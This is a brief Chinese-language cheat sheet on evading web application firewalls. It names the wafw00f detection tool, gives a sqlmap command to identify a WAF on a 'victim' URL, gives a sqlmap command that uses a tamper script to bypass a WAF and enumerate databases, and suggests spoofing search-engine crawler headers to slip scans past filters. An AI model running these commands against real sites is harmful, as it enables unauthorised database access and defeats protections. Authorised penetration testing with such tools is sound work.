WAF检测工具:
https://github.com/EnableSecurity/wafw00f
Sqlmap 检测waf:
python3 sqlmap.py -u “http://www.victim.org/ex.php?id=1” --identify-waf
sqlmap过waf:
脚本的完整列表地址在sqlmap/tamper。参数--tamper
sqlmap.py -u "http://www.***.com/index.php?id=829" -v 3 --dbs --batch --tamper "space2morehash.py"
关于扫描绕过:
加载百度、谷歌爬虫请求头